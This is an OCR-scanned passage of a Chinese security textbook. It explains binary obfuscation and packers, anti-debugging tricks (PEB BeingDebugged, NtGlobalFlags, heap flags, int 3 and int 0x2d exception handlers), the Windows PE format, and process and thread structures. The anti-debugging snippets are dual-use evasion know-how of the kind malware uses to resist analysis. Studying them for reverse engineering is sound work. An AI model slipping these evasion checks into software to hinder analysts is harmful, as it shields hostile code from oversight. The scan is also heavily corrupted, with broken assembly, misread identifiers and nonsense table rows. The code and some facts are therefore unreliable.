进行 分 析 , 二 进 制 代 码 混淆 的 直接 目的 就 是 对 抗 反 汇编 ,大 致 可 分 为 两 大 类 : 其 一 是 “ 反 
反 汇 编 " 的 混淆 , 即 针 对 反 汇 编 缺 陷 进行 设计 使 反 汇 编 出 错 , 或 者 对 代码 加 密 混淆 使 其 无 
法 得 到 真正 的 运行 代码 ;其 二 是 指令 控制 流 混淆 ,用 来 增加 理解 .分析 反 汇编 代码 的 难度 。 

反 反 汇编 包括 对 抗 静态 反 汇编 和 对 抗 动态 反 汇编 。 静 态 反 汇 编 主 要 采取 线性 扫描 和 
递归 扫描 的 方式 进行 指令 扫描 反 汇编 ,通过 在 指令 内 部 插入 不 完整 的 指令 数据 可 以 导致 
反 汇编 的 指令 翻译 出 错 ,但 为 了 保证 代码 的 正常 执行 需要 构造 分 支 跳 转 。 例 如 花 指 令 技 
术 , 在 指令 流 中 插入 垃圾 数据 ,干扰 反 汇 编 确定 指令 的 位 置 ,比如 在 call 指令 后 续 置 和 人 1 
字 节 的 非法 指令 数据 ,设计 call 对 象 函数 返回 时 返回 到 call 指令 后 的 第 二 字 节 位 置 , 从 该 
位 置 开 始 的 指令 序列 才 是 正确 的 指令 , 反 汇 编 时 从 错误 的 位 置 进行 解析 ,可 能 直接 遇 到 无 
法 解析 的 指令 ,或 者 将 第 一 字 节 的 数据 与 后 续 指 令 联合 解析 导致 整 条 反 汇 编 链 的 错误 。 
如 图 2-7 所 示 ,在 程序 的 实际 流程 图 中 ,调用 函数 返回 到 指令 mov [ebp-8],eax 这 条 指令 
位 置 ,但 经 过 反 汇 编 后 call 的 下 一 条 指令 为 add eax,90f84589h 这 条 指令 , 即 错误 地 将 这 
条 指令 当成 了 函数 返回 后 执行 的 指令 ,如 图 2-8 所 示 ,因为 反 汇 编 无 法 检测 到 函数 内 部 自 
身 修改 了 返回 地 址 ,导致 执行 位 置 发 生 了 微妙 变化 ,无 论 是 线性 扫描 算法 还 是 递归 下 降 扫 
描 算法 都 会 出 错 。 


























main Foo proc near 
E8F7FFFFFF call foo | 一 调用 一 ~| FF 04 24 inc dword ptr [esp] 
05 db 5; [— K e retn 

返回 
89 45 F8 mov [ebp-8],eax -——À Foo endp 
90 nop 





图 2-7 正确 的 执行 流程 




















main Foo proc near 
E8F7FFFFFF call foo | 一 调用 一 ”~| FF 04 24 inc dword ptr [esp] 
05 89 45 F8 90 add eax, 90f84589h 上 一 返回 一 | C3 retn 

Foo endp 








图 2-8 反 汇 编 的 执行 流程 


通过 加 密 、 加 壳 的 技术 对 代码 进行 保护 也 是 常用 的 一 种 混淆 手段 ,这 种 方式 加 密 的 程 
序 需要 在 代码 运行 时 通过 解密 操作 将 真实 代码 恢复 出 来 ,这 也 被 称 为 代码 自修 改 技术 , 英 
文 为 Self-Modifying Code(SMC)。 常 用 的 加 壳 工 具有 ASPack、UPX、ZProtect 等 ,每 种 
工具 有 其 对 应 的 加 壳 算 法。 
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混淆 和 加 壳 可 以 对 抗 静态 反 汇 编 , 但 无 法 应 对 动态 反 汇 编 技 术 ,动态 反 汇 编 需要 在 程 
序 执行 过 程 中 插入 int 3 中 断 指令 ,然后 读 取 内 存 信息 获得 程序 的 执行 指令 ,但 其 只 能 获 
得 程序 的 部 分 指令 ,因为 程序 的 运行 只 是 对 一 次 特定 输入 数据 的 计算 过 程 ,并 不 会 遍历 所 
有 指令 。 通 过 完整 性 校 验 、 断 点 检测 等 可 以 实现 反 调试 技术 ,但 随 着 虚拟 化 技术 的 发 展 ， 
通过 虚拟 化 平台 也 能 够 提取 到 执行 的 指令 序列 ,从 而 对 程序 执行 的 指令 进行 反 汇 编 。 

二 进 制 代 码 混淆 的 第 二 类 方法 是 指令 控制 流 混淆 ,扰乱 汇编 代码 的 可 读 性 ,增加 理 
解 、 分 析 反 汇编 代码 的 难度 。 这 类 混淆 方法 不 会 受到 静态 反 汇编 . 动 态 调试 和 虚拟 化 分 析 
技术 突破 的 影响 。 例 如 在 代码 中 使 用 大 量 的 堆栈 实现 跳 转 , 通 过 push 加 ret 的 方式 实现 
jmp 的 功能 ,这 种 处 理 方式 能 够 使 代码 难以 阅读 ,VMProtect 虚拟 化 混淆 工具 就 大 量 使 用 
了 这 种 手段 。 另 外 ,通过 寄存 器 实现 跳 转 也 可 以 增加 代码 阅读 的 难度 ,比如 jmp eax, 
call [eax] 等 。 
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在 程序 逆向 分 析 行 业 里 ,动态 调试 分 析 是 最 常用 的 分 析 方 法 之 一 , 它 能 够 弥补 静态 分 
析 中 难以 处 理 代码 加 过 及 花 指令 等 混淆 的 不 足 。 与 此 同时 , 反 调试 技术 也 迅速 发 展 ,包括 
基于 调试 特征 检测 的 反 调试 和 基于 调试 特征 隐藏 关键 代码 的 对 抗 调试 ,下 面 介绍 几 种 常 
见 的 反 调试 技术 。 

1. 基于 调试 特征 检测 的 反 调试 

当 程 序 处 于 被 调试 状态 时 ,PEB 结构 中 有 一 个 beingDebug 标志 会 被 置 为 非 0, 它 位 
于 PEB 环境 中 偏 移 为 0x2 的 位 置 , 读 取 该 标志 能 够 判断 程 ET 
序 是 否 处 于 调试 状态 。 图 2-9 为 取出 beingDebug 标志 的 mov eax, byte [eax+2] 
代码 。 des Dsbugge Detecied 

PEB 结构 中 的 NtGlobalFlags 标志 也 表明 了 调试 器 的 E 
存在 ,默认 情况 下 该 值 为 0, 在 Windows 2000 和 其 后 的 ”图 2-9 基于 PEB 结构 的 
Windows 平台 下 ,在 调试 中 ,该 标志 会 被 设置 为 一 个 特定 的 beingDebug 反 调 试 
值 。 图 2-10 为 使 用 NtGlobalFlags 标志 进行 调试 检测 的 
代码 。 

进程 堆 里 也 有 一 个 标志 Heap_ForceFlags 可 以 用 于 调试 检测 ,通常 情况 下 该 标志 为 
0。 例 如 ,通过 图 2-11 所 示 的 代码 可 以 获取 该 标志 进行 调试 状态 检测 。 





mov eax, fs:[30h] 
mov eax [eaxt+ 1h] ;process heap 
mov eax, [eax+10h] :heap flags 
test eax, eax 


mov eax, fs. [30h] 
mov cax, [cax+68h] 

and eax, 0x70 

test eax, eax 

jne @DebuggerDetected 


jne @DebuggerDetected 











图 2-10 基于 PEB 结构 的 NtGlobalFlags 反 调试 图 2-11 基于 堆 标志 的 反 调试 


2. 基于 调试 特征 隐藏 代码 
异常 中 断 指令 int 3 常 被 用 来 设置 软件 断 点 ,在 程序 代码 里 植 和 人 inc 3 指令 是 一 个 经 
典 的 反 调试 手段 。 当 程序 未 被 调试 时 ,将 会 进入 异常 处 理 继续 执行 ,通过 try catch 的 形 
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式 能 够 保障 程序 正常 运行 ;而 当 程 序 处 于 调试 阶段 的 时 候 ,int 3 被 当成 调试 器 自己 的 断 
点 ,从 而 不 会 进入 异常 处 理 程序 ,将 核心 代码 写 入 异常 处 理 过 程 ,能 够 避 开 调试 器 的 执行 
调用 。 例 如 图 2-12 所 示 的 异常 处 理 代码 ,程序 正常 执行 时 触发 断 点 异常 ,进入 异常 处 理 
代码 执行 TrueFunc 函数 ;而 当 处 于 调试 状态 时 ,在 int 3 指令 处 中 断 一 次 ,随后 只 能 执行 
到 FalseFunc 函数 。 另 外 ,int 3 指令 也 可 以 换 成 int 0x2d 指令 ,该 指令 在 程序 未 被 调试 时 
也 能 触发 一 个 断 点 异常 。 如 果 被 调试 并 且 未 使 用 跟踪 标志 执行 这 个 指令 , 将 不 会 有 异常 
产生 程序 正常 执行 ;如 果 被 调试 并 且 指 令 被 跟踪 ,尾随 的 字 节 将 被 跳 过 ,可 以 在 该 指令 之 
后 添加 一 条 nop 指令 ,然后 继续 执行 。 与 int 3 相 比 ,int 0x2d 的 反 调试 有 更 强 的 隐蔽 性 ， 
因为 int 3 会 在 调试 过 程 中 触发 中 断 , 从 而 被 分 析 人 员 发 现 。 


日 int filter (unsigned int code, struct _EXCEPTION_POINTERS *ep)í 
if( code -- 0x80000003 ) { 
return EXCEPTION EXECUTE HANDLER.; 
} 
else { 
return EXCEPTION CONTINUE SEARCH; 
i 


} 
void WorkFunc () { 
ryt 


__try{ 
__asn int 3 


].. finally! } 
FalseFunc(); 

1]. except(filter(GetExceptionCode(), GetExceptionInformation(Q)) [ 
TrueFunc () ; 


} 





图 2-12 异常 处 理 反 调试 代码 
图 2-13 所 示 的 异常 处 理 反 调 试 效果 是 上 述 反 调试 代码 生成 测试 程序 的 运行 结果 。 未 
加 干扰 时 int 2d 和 int 3 触发 exception 后 执行 正确 的 True 分 支 ;而 在 Pin 插 桩 跟踪 下 ,int 3 
的 反 调试 能 力 未 能 体现 ,程序 执行 正确 的 True 分 支 ,int 2d 仍 具 有 反 追 踪 能 力 ,程序 未 触发 
正确 分 支 ,被 引入 了 False 分 支 。 在 WinDbg 调试 下 ,两 者 都 具备 反 调试 的 能 力 。 


T) DAPinVexception.exe [ej ej 


(a) 无 干扰 正常 执行 


-t pindllinscountQ.dll -- exception.exe 





(b) Pin 插 桩 跟踪 下 执行 
图 2-13 异常 处 理 反 调试 效果 
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(c) WinDbg 调试 跟踪 下 执行 


图 2-13 (4D 


2.3 Windows 操作 系统 基础 





操作 系统 是 软件 运行 的 基础 软件 平台 ,掌握 操作 系统 中 的 相关 机 制 和 原理 对 于 恶意 
代码 分 析 和 软件 漏洞 分 析 具 有 重要 的 指导 意义 。 本 节 从 PE 文件 结构 .系统 进程 管理 、 线 
程 管理 .内 存 管理 、 对 象 与 句柄 管理 ,文件 系统 等 方面 介绍 Windows 操作 系统 的 一 些 基本 
原理 和 特点 。 
231 PE 文件 结构 

PE 文件 是 微软 公司 的 Windows 操作 系统 上 的 可 执行 文件 ,全 称 为 Portable 
Executable, 意 为 可 移植 的 可 执行 文件 ,包括 扩展 名 为 EXE、DLL、OCX、SYS、COM 等 的 
文件 。PE 文件 按照 机 器 字 长 可 分 为 16 位 、32 位 和 64 位 ,本 节 以 32 位 的 PE 文件 格式 为 
例 进行 介绍 ,其 余 类 似 。PE 文件 包括 PE 文件 头 和 PE 数据 区 ,如 图 2-14 所 示 ,PE 文件 



































头 包括 DOS KA PE 3k, PE 数据 区 包括 区 块 表 和 区 块 ,区 块 中 包括 导入 表 、 导 出 表 等 
部 分 。 
DOS MZ 头 
DOS 头 
DOS Stub 
PE 文件 头 
PE 头 PE 头 
区 块 表 
PE: 区 
区 块 数据 iim 
图 2-14 PE 结构 划分 
1. DOS 头 


nu 


每 个 PE 文件 都 以 DOS MZ 头 开始 ,开头 2 字 节 为 MZ 字符 , 偏 移 0x3c 处 的 2 字 节 
为 e_lfanew 字段 ,指示 PE 头 在 文件 中 的 偏 移 位 置 。 其 他 字段 以 及 DOS Stub 在 Win32 
环境 下 未 使 用 ,可 忽略 。 


2. PE X: 
PE 头 是 PE 文件 的 主要 定位 信息 所 在 ,其 位 置 由 DOS MZ 头 中 的 e Ifanew 字段 确 
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定 , 其 结构 为 IMAGE NT HEADER. ,由 3 个 字段 组 成 ,如 下 所 示 : 


typedef struct IMAGE NT HEADERS{ 

DWORD Signature; 

IMAGE FILE HEADER FileHeader; 

IMAGE OPTIONAL HEADER32 OptionalHeader; 
)IMAGE NT HEADERS32, * PIMAGE NT HEADERS32; 


(D Signature 字段 为 PE 文件 标志 符 , 值 为 0x00004550。 
(2) FileHeader 字段 包含 了 PE 文件 的 基本 信息 ,由 7 个 字段 组 成 ,结构 如 下 所 示 


typedef struct IMAGE FILE HEADERSÍ 


WORD Machine; // 可 执行 文件 Ceu 2698 , 1386 9X, ia64 

WORD — NumberOfSections; // 区 块 数量 

DWORD TimeDateStamp; // 文 件 创建 时 间 ,GMr 时 间 

DWORD PointerToSymbolTable; //coFF 符号 表 文件 偏 移 位 置 

DWORD NumberOfSymbols; // 符 号 表 中 的 符号 数目 

WORD — SizeOfOptionalHeader; // 紧 跟 在 1MAGE FILE HEADERS 后 面 的 数据 大 小 
WORD Characteristics; // 表 明文 件 的 属性 


} IMAGE FILE HEADER, * PIMAGE FILE HEADER; 


Characteristics 字段 值 的 含义 如 表 2-6 所 示 。 


表 2-6 ”Characteristics 字段 的 含义 




















字 段 值 * x 
IMAGE FILE RELOCS STRIPPED 表示 不 可 重 定位 
IMAGE_FILE_EXECUTABLE_IMAGE 文件 是 可 执行 的 
IMAGE FILE AGGRESIVE WS TRIM 让 操作 系统 强制 整理 工作 区 
IMAGE FILE LARGE, ADDRESS AWARE 应 用 程序 可 以 处 理 超过 2GB 地 址 
IMAGE_FILE_32BIT_MACHINE 目标 平台 为 32 位 机 
IMAGE_FILE_DEBUG_STRIPPED 不 包含 调试 信息 





IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 


如 果 映 像 在 可 移动 媒介 ,从 SWAP 区 运行 





IMAGE FILE NET RUN FROM SWAP 


如 果 映 像 在 网 络 , 从 SWAP 区 运行 





IMAGE_FILE_DLL 


文件 是 一 个 DLL 





IMAGE_FILE_UP_SYSTEM_ONLY 





文件 仅 能 运行 在 单 处 理 器 上 





(3) OptionalHeader 字段 ,是 IMAGE OPTIONAL HEADER32 结构 ,定义 如 下 : 


typedef struct IMAGE OPTIONAL HEADER32( 


WORD Magic; // 标 记 字 ,确定 头 部 类 型 

BYTE ^ MajorLinkerVersion; // 连 接 器 主 版 本 号 

BYTE ^ MinorLinkerVersion; // 连 接 器 次 版 本 号 

DWORD — SizeOfCode; // 所 有 带 IMAGE SCN CNT CODE 的 属性 区 块 总 大 小 
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IMAGE DATA DIRECTORY DataDirectory[16]; 


SizeOfInitializedData; 


SizeOfUnInitializeData; 


AddressOfEntryPoint; 
BaseOfCode; 
BaseOfData; 
ImageBase; 
SectionAlignment; 
FileAlignment; 
MajorOSVersion; 
MinorOSVersion; 
MajorlImageVersion; 
MinorlmageVersion; 
MajorSubsystemVersion; 
MinorSubsystemVersion; 
Win32VersionValue; 
SizeOflImage; 
SizeOfHeads; 
CheckSum; 

Subsystem; 
DllCharacteristics; 
SizeOfStackReseve; 
SizeOfStackCommit; 
SizeOfHeapReseve; 
SizeOfHeapCommit; 
LoaderFlags; 
NumberOfRvaAndSizes; 


// 所 有 初始 化 数据 区 块 总 大 小 

// 所 有 未 初始 化 数据 区 块 总 大 小 

// 程 序 执行 人 口 RVA 

// 代 码 区 块 的 起 始 RVA 

// 数 据 区 块 的 起 始 RVA 

// 文 件 在 内 存 中 的 首选 装载 地 址 

// 装 入 内 存 中 时 的 区 块 对 齐 大 小 

// 民 文件 内 的 区 块 对 齐 大 小 

// 需 要 的 操作 系统 主 版 本 号 

// 需 要 的 操作 系统 次 版 本 号 

// 可 执行 文件 主 版 本 号 

// 可 执行 文件 次 版 本 号 

// 需 要 的 操作 系统 子 系统 主 版 本 号 

// 需 要 的 操作 系统 子 系统 次 版 本 号 

// 保 留 字段 ,设置 为 0 

// 映 像 装 人 内 存 后 的 总 大 小 

//Dpos 头 ,EE 头 、 区 块 表 的 总 大 小 

// 映 像 的 校 验 和 

// 标 明 是 否 需 要 子 系统 ,如 windows GUI, fifi fi 

/ [DLL 特性 的 标识 

//exe 文 件 里 ,为 线程 保留 的 栈 大 小 

//exe 文 件 里 ,初始 委派 给 栈 的 大 小 ,默认 4KB 

/ exe 文件 里 ,默认 进程 初始 保留 的 堆 大 小 ,默认 1MB 

//exe 文 件 里 ,委派 给 堆 的 大 小 ,默认 4FB 

// 与 调试 相关 ,默认 为 0 

// 数 据 目录 表 项 数 , 自 Windows NT 以 来 一 直 为 16 
// 数 据 目录 表 


) IMAGE OPTIONAL HEADER32, * PIMAGE OPTIONAL HEADER32; 


最 后 一 个 结构 数据 目录 表 的 结构 IMAGE DATA. DIRECTORY 定义 如 下 ,包括 数 
据 的 RV A 地 址 和 数据 的 大 小 。 


typedef struct IMAGE DATA DIRECTORY( 


DWORD VirtualAddress; 
DWORD Size; 
)IMAGE DATA DIRECTORY, * PIMAGE DATA DIRECTORY; 


3. 区 块 表 


// 数 据 RVA 地 址 
// 数 据 的 大 小 


从 区 块 表 开始 ,后 续 数 据 属 于 PE 文件 的 数据 区 。 区 块 表 是 一 个 结构 数组 ,每 个 结构 
包含 了 它 所 关联 的 区 块 信息 ,如 位 置 、 长 度 、 属 性 等 ,该 结构 为 IMAGE_SECTION_ 
HEADER ,定义 如 下 : 


typedef struct IMAGE SECTION HEADER{ 


BYTE 
DWORD 


Name [8]; 


VirtualSize; 


// 块 名 ,8 个 RscII 字 符 表 示 
// 指 出 实际 使 用 的 区 块 大 小 


VirtualAddress; 
SizeOfRawData; 
PointerToRawData; 
PointerToRelocations; 
NumberOfRelocations; 
NumberOfLinenumbers; 


Characteristics; 
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// 该 区 块 在 内 存 中 的 RVA 位 置 

// 该 区 块 在 磁盘 文件 中 的 大 小 

// 该 区 块 在 文件 中 的 偏 移 位 置 

/ [EXE 中 无 意义 ,0BJ 中 表示 重 定位 偏 移 量 
//PointerToRelocations 域 指向 的 重 定位 的 数目 
//NumberofRelocations 域 指向 的 行 号 的 数目 
// 块 属性 ,指示 是 数据 ,代码 . 读 、 写 .执行 等 属性 


) IMAGE SECTION HEADER, * PIMAGE SECTION HEADER; 





区 块 表 的 Characteristics 字段 值 的 含义 如 表 2-7 所 示 。 


表 2-7 区 块 表 Characteristics 字段 值 的 含义 属性 





























字 段 值 含 党 
IMAGE_SCN_CNT_CODE 该 区 块 包含 代码 段 
IMAGE_SCN_MEM_EXECUTE 该 区 块 可 执行 
IMAGE_SCN_CNT_INITIALIZED_DATA 该 区 块 包含 已 初始 化 的 数据 
IMAGE_SCN_CNT_UNINITIALIZED_DATA | 该 区 块 包含 未 初始 化 的 数据 
IMAGE_SCN_MEM_DISCARDABLE 该 区 块 可 被 丢弃 
IMAGE_SCN_MEM_NOT_PAGED 该 区 块 不 能 进行 页 交换 
IMAGE_SCN_MEM_SHARED 包含 此 区 块 的 页 是 共享 的 
IMAGE_SCN_MEM_READ 该 区 块 可 读 
IMAGE_SCN_MEM_WRITE 该 区 块 可 写 





IMAGE_SCN_LNK_INFO 


在 OBJ 中 使 用 ,该 区 块 包含 供 链接 器 使 用 的 信息 





IMAGE_SCN_LNK_REMOVE 


在 OBJ 中 使 用 ,该 区 块 内 容 不 作为 映像 部 分 





IMAGE_SCN_LNK_COMDAT 


该 区 块 内 容 是 公共 数据 ,可 在 多 OBJ 中 定义 





IMAGE_SCN_ALIGN_XBYTES 





在 最 后 的 可 执行 文件 中 该 区 块 的 对 齐 大 小 





4. 区 块 数据 





区 块 表 之 后 是 区 块 数据 ,通过 IMAGE_SECTION_HEADER 结构 中 的 偏 移 量 可 以 











定位 区 块 的 位 置 ,常见 的 区 块 包括 代码 区 块 、 读 写 区 块 、 导 入 表 、 导 出 表 等 ,如 表 2-8 所 示 。 
表 2-8 区 块 名 称 及 描述 
区 块 名 称 区 块 描述 
.text 默认 的 代码 区 块 
. data 默认 的 读 / 写 数据 区 块 ,全 局 变量 位 于 此 区 块 





. rdata 


默认 的 只 读数 据 区 块 ,字符 文字 、C++ /COM 的 vtable 位 于 此 区 块 





.idata 


导入 表 ,可 被 合并 到 其 他 区 块 ,如 . rdata 区 块 








. edata 


导出 表 , 包 含 导出 的 API 信息 , 供 其 他 模块 调用 ,也 可 被 合并 到 其 他 模块 
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续 表 





区 块 描述 





资源 区 块 ,是 只 读 区 块 





未 初始 化 数据 区 块 





用 于 支持 C++ 运行 时 CRT 所 添加 的 数据 





.tls 


用 于 支持 通过 _declspec(thread) 声 明 的 线程 局 部 存储 变量 的 数据 





. reloc 


可 执行 文件 的 基 址 重 定位 ,一 般 用 于 DLL 





. sdata 


相对 于 全 局 指针 的 可 被 重 定位 的 读 / 写 数据 





. srdata 


相对 于 全 局 指针 的 可 被 重 定位 的 只 读数 据 





. pdata 


异常 表 区 块 ,用 于 异常 处 理 





.debug$ S 


OBJ 文件 中 一 个 变量 长 度 的 Codeview 格式 的 符号 记录 流 





.debug $ T 


OBJ 文件 中 一 个 变量 长 度 的 Codeview 格式 的 类 型 记录 流 





.debug$ P 


OBJ 文件 中 标记 使 用 了 预 编译 头 





. drectve 


OBJ 文件 中 包含 的 链接 器 命令 





. didat 





延迟 装 入 的 输入 数据 ,release 模式 下 会 合并 到 其 他 区 块 


5. 区 块 中 的 导出 表 

Windows 系统 中 大 量 使 用 了 DLL (动态 链接 库 ),DLL 提供 了 一 组 供 EXE 或 其 他 
DLL 调用 的 函数 ,为 了 让 EXE 能 够 定位 到 这 些 函 数 ,PE 格式 中 定义 了 导出 表 。 函 数 调 
用 时 可 以 使 用 导出 表 中 的 函数 名 或 者 序号 进行 引用 ,导出 表 的 结构 定义 如 下 : 


typedef struct IMAGE EXPORT DIRECTORY{ 


Characteristics; // 输 出 属性 标志 ,目前 总 是 0 
TimeDateStamp; // 导 出 表 创 建 时 间 

MajorVersion; // 导 出 表 主 版 本 号 ,未 使 用 ,0 
MinorVersion; // 导 出 表 次 版 本 号 ,未 使 用 ,0 

Name; // 指 向 动态 库 名 称 的 RVA 

Base; // 导 出 表 的 起 始 序号 ,通过 序号 检索 需要 减 去 Base 
NumberOfFunctions; / [ER (导出 函数 地 址 表 ) 的 条 目 数量 
NumberOfNames; / /£NT (导出 函数 名 称 表 ) 的 条 目 数 量 
AddressOfFunctions; //FAT 的 RVA, 非 0 的 RVA 对 应 被 导出 的 符号 
AddressOfNames; //ENT 导 出 函数 名 称 表 的 RVA 
AddressOfNameOrdinals; //FOT 输 出 序号 表 的 RVA 


} IMAGE EXPORT DIRECTORY, * PIMAGE EXPORT DIRECTORY; 


IMAGE_EXPORT_DIRECTORY 结构 中 的 AddressOfFunctions 指向 了 导出 函数 
地 址 表 FAT, 表 数目 为 NumberOfFunctions ,每 个 表 项 记录 了 一 个 导出 函数 的 地 址 ; 
AddressOfNames 指向 了 导出 函数 名 称 表 FNT, 表 数目 为 NumberOfNames, 表 项 是 函数 
名 字符 串 指 针 和 序号 ,通过 字符 串 指针 提取 函数 名 ;AddressOfNameOrdinals 指向 了 序号 
表 , 序 号 值 减 去 Base 可 作为 索引 ,在 FAT 中 定位 出 函数 的 地 址 。 如 图 2-15 所 示 , 若 以 函 
数 符号 进行 函数 调用 ,通过 AddressOfNames 指针 获取 FEFNT., 通 过 字符 串 指针 取得 表 项 
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函数 名 ,与 调用 函数 名 匹配 ,车 匹配 成 功 , 则 获取 其 FOT 表 中 的 序号 值 ,序号 值 减 去 序号 
基 值 Base 作为 索引 ,在 FAT 表 中 取得 对 应 项 的 函数 子 程序 地 址 ,然后 加 上 模块 基地 址 进 
行 函 数 调用 。 

6. 区 块 中 的 导入 表 

与 导出 表 相对 应 的 是 导入 表 . 用 于 记录 模块 引用 外 部 模块 变量 或 函数 的 信息 。 导 入 
表 是 一 个 以 IMAGE_IMPORT_DESCRIPTOR 结构 为 数组 的 数据 区 块 , 没 有 字段 指明 该 
结构 数组 的 项 数 ,但 它 的 最 后 一 个 单元 全 部 用 0 填充 以 表示 结束 。 结 构 的 定义 如 下 : 


typedef struct IMAGE IMPORT DESCRIPTOR( 


DWORD  OriginalFirstThunk; // 导 人 函数 名 称 表 (INT) 的 RVA 

DWORD TimeDateStamp; // 导 入 表 创建 时 间 

DWORD ForwarderChain; // 第 一 个 被 转向 的 REI 的 索引 , 若 没有 则 设 为 -1 
DWORD Name; // 指 向 被 输入 的 DLL 名 称 的 指针 

DWORD —FirstThunk; // 导 入 函数 地 址 表 (IaT) 的 RVA 


} IMAGE IMPORT DESCRIPTOR, * PIMAGE IMPORT DESCRIPTOR; 


如 图 2-16 所 示 ,IMAGE_IMPORT_DESCRIPTOR 结构 中 的 OriginalFirstThunk 指 
向 了 导入 函数 名 称 表 INT, FirstThunk 指向 了 导入 函数 地 址 表 IAT,INT 和 IAT 都 是 
IMAGE_THUNK_DATA 结构 类 型 的 元 素 , 本质 上 是 相同 的 ,都 是 一 个 指针 大 小 的 
UNION, 对 应 一 个 从 可 执行 文件 输入 的 导入 函数 ,IAT 由 PE 加 载 器 生成 。 
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Original TimeDataStamp. ForwarderChain Name FirstThunk 
First Thunk 
Import Thunk 时 间 日 期 记录 正 Jen DLL 名 字符 串 Import Thunk 
Data 数 组 RVA 值 | Hsc 的 RYA 值 Data 数 组 RVA 值 
4 | 4 | 4 4 4 
KERNEL 32 DLL 
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INT 
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DeleteFileA 
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图 2-16 导入 表 远 辑 关 系 图 
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232 进程 管理 


进程 是 计算 机 中 的 程序 关于 特定 数据 集合 上 的 一 次 运行 活动 ,是 系统 进行 资源 调度 
和 分 配 的 基本 单位 。Windows 进程 由 一 个 执行 体 进程 块 来 表示 , 称 为 EPROCESS 块 。 
EPROCESS 块 中 包含 进程 相关 的 属性 (如 进程 管理 结构 PCB) 和 指向 进程 相关 数据 结构 
的 指针 (如 进程 环境 块 (PEB))。EPROCESS 块 相关 的 数据 结构 位 于 系统 内 核 空间 中 ,但 
PEB 位 于 进程 地 址 空间 中 ,其 中 包含 一 些 需要 由 用 户 模式 代码 进行 修改 的 信息 。 

1. EPROCESS 结构 

EPROCESS 结构 包括 内 核 进程 块 、 进 程 标识 (进程 ID, SHERE ID 映像 文件 名 ) GB h 
状态 .创建 时 间 、 退 出 时 间 、 工 作 集 信息 、 虚 拟 内 存 信息 、 异 常 端口 ,调试 器 端口 ,访问 令 牌 、 
句柄 表 、 设 备 映射 表 、 进 程 环境 块 、 映 像 基 地 址 、 进 程 优先 级 、Windows 子 系统 进程 块 、 作 
业 对 象 等 属性 信息 。 这 些 属性 信息 的 说 明 如 表 2-9 所 示 。 

表 2-9 EPROCESS 结构 内 容 








结构 元 素 相关 说 明 
KPROCESS 块 , 记 录 了 共用 的 分 发 器 对 象 头 、 指 向 进程 页 目录 的 指针 、 该 
内 核 进程 块 进程 的 内 核 线 程 块 (RTHREAD) 的 列表 、 默 认 的 基本 优先 级 、 时 限 、 亲 和 
性 掩 码 、 进 程 中 的 线程 内 核 总 时 间 和 用 户 总 时 间 
进程 标识 进程 标识 包括 进程 ID. SC SERE ID .进程 对 应 文件 名 ,进程 所 在 窗口 





虚拟 地 址 描述 符 (VAD) | 一 系列 的 数据 结构 ,用 于 描述 该 进程 各 个 部 分 的 状态 
一 个 指向 内 存 工 作 集 列表 的 指针 ,该 结构 包含 当前 的 、 最 大 的 和 最 小 的 


























工作 集 信息 内 存 工作 集 大 小 ,页 面 错误 计数 值 , 内 存 优先 级 和 页 面 换 出 标志 等 信息 
ERTEDEHXRE URNHURIARRRATA KR 
mem 跨 进程 的 通信 通道 , 当 该 进程 有 一 个 线程 引发 了 一 个 异常 时 ,进程 管理 
器 向 该 通道 发 送 一 个 消息 
跨 进 程 的 通信 通道 , 当 该 进程 有 一 个 线程 引发 了 一 个 调试 事件 时 , 进 各 
管理 器 向 该 通道 发 送 一 个 消息 
访问 令 牌 执行 体 对 象 ,描述 了 该 进程 的 安全 轮 亡 
句柄 表 记录 了 针对 每 个 进程 的 句柄 表 的 地 址 
设备 映射 表 记录 了 用 于 解析 设备 名 称 引用 的 对 象 目录 的 地 址 
A ` ~ i) ` A Y E "i 
did CARRIEN CER RES AD EDERRA EREE 








Windows 子 系统 进程 块 | Windows 子 系统 的 内 核 模式 组 件 所 需要 的 进程 细节 





2. 内 核 进程 块 

内 核 进程 块 (KPROCESS) 是 EPROCESS 块 的 一 个 组 成 部 分 ,包含 了 进程 对 象 的 额 
外 属性 信息 ,也 被 称 为 进程 控制 块 (PCB), 它 包含 了 Windows 内 核 在 调度 线程 时 所 需 的 
基本 信息 ,其 相关 属性 如 图 2-17 所 示 。 其 中 的 页 目录 指针 指向 了 进程 内 存 页 目录 的 位 
署 ,内 核 时 间 和 用 户 时 间 记录 了 进程 执行 占用 的 时 钟 周期 ,线程 结构 指针 指向 了 进程 保护 
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的 线程 结构 体 ,此 外 还 包括 进程 优先 级 线程 时 限 .进程 状态 等 属性 。 





分 发 器 头 
页 目录 指针 e 进程 页 目录 
内 核 时 间 
用 户 时 间 
换 进 / 换 出 列表 项 
线程 结构 指针 -十 ~ KTHREAD 
进程 自 旋 锁 
进程 亲 和 性 
常 驻 内 核 栈 计数 值 
进程 基本 优先 级 
默认 线程 时 限 
线程 种 子 
禁止 提升 标志 
图 2-17 内核 进程 结构 










































































3. 进程 环境 块 

进程 环境 块 (PEB) 是 EPROCESS 块 中 指针 指向 的 一 个 结构 ,包含 了 有 关 进 程 对 象 的 
额外 信息 ,该 结构 处 于 进程 的 用 户 态 内 存 中 ,部 分 信息 需要 由 用 户 代码 进行 修改 。PEB 
的 相关 属性 如 图 2-18 所 示 , 其 中 的 映像 基地 址 是 进程 文件 加 载 到 内 存 的 基地 址 ,模块 列 
表 包 括 程序 映像 模块 和 涉及 的 动态 库 模块 ,此 外 还 有 进程 堆 信息 ,包括 数量 大小、 位置 指 
针 等 。 


233 线程 管理 


线程 是 程序 执行 流 的 最 小 单元 ,是 进程 中 的 一 个 实体 ,是 被 操作 系统 独立 调度 和 分 派 
的 基本 单位 。 线 程 本 身 不 独占 系统 资源 ,与 同属 一 个 进程 的 其 他 线程 共享 进程 所 拥有 的 
全 部 资源 。Windows 线程 由 一 个 执行 体 线程 块 ETHREAD 来 表示 ,ETHREAD 块 包含 
了 线程 的 基本 属性 和 指向 其 他 结构 的 指针 ,除了 线程 环境 块 (TEB) 外 均 位 于 系统 地 址 空 
间 中 。 

1. 线程 块 

线程 块 (ETHREAD) 是 线程 的 基本 结构 ,其 包含 了 内 核 线 程 块 指针 、 创 建 时 间 和 退 
出 时 间 、 所 属 进程 的 ID 标识 、 线 程 启动 地 址 .定时 器 等 属性 。 如 图 2-19 所 示 ,第 一 个 域 是 
内 核 线程 块 KTHREAD, 紧 随 其 后 的 是 线程 标识 ID 信息 和 创建 /退出 时 间 ,然后 是 一 个 
指向 所 属 进程 结构 的 指针 ,通过 它 可 以 获取 环境 信息 ,此 外 还 有 访问 令 牌 、 身份 模仿 信息 
